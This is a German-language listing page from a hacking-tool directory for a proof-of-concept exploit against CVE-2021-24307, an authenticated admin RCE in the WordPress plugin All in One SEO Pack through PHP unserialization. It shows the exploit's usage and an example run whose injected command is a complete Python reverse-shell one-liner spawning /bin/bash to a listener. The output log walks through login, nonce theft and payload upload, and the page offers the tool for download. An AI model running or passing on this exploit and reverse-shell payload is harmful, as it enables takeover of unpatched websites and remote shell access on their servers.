Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-24307-all-in-one-seo-pack-admin-rce — Proof-of-Concept-Exploit für CVE-2021-24307, eine authentifizierte Admin-RCE in All in One SEO Pack <= 4.1.0.1 über PHP-Unserialisierung, die die Ausführung beliebiger Befehle ermöglicht. | Kitploit
Tools/GitHubGitHub/darkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubdarkpills/cve-2021-24307-all-in-one-seo-pack-admin-rce

CVE-2021-24307-all-in-one-seo-pack-admin-rce

Proof-of-Concept-Exploit für CVE-2021-24307, eine authentifizierte Admin-RCE in All in One SEO Pack <= 4.1.0.1 über PHP-Unserialisierung, die die Ausführung beliebiger Befehle ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
42vor 4 JahrenNoch nicht geprüft
Teilen

Admin PHP unserialization RCE in All in one SEO pack (CVE-2021-24307)

Einfacher PoC einer authentifizierten RCE als Admin in AISEO <= 4.1.0.1, bereitgestellt als Beispiel.

Vollständiger Artikel hier: https://darkpills.com/php-unserialize-write-up-with-admin-rce-in-all-in-one-seo-pack-cve-2021-24307/

Verwendung:

root@kitploit:~
php exploit.php url login password php_command arguments [proxy]

Beispiel:

root@kitploit:~
└─$ php exploit.php http://wordpress/ admin admin shell_exec "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" localhost:8080

-- All-in-one-seo-pack <= 4.1.0.1 authentifizierte Admin-RCE --
-- Exploit von Vincent MICHEL (@darkpills) --

[+] Authentifiziere bei wordpress http://wordpress/
[+] WP-REST-API-Nonce abrufen
[+] Nonce gefunden: 6aeb9ddf05
[+] POST-Payload wird generiert, um Befehl auszuführen: shell_exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'")
[+] Lade INI-Datei mit Import-Einstellungen hoch
[+] Fertig! Prüfe das Ergebnis irgendwo (blinde Befehlsausführung)
Tool herunterladen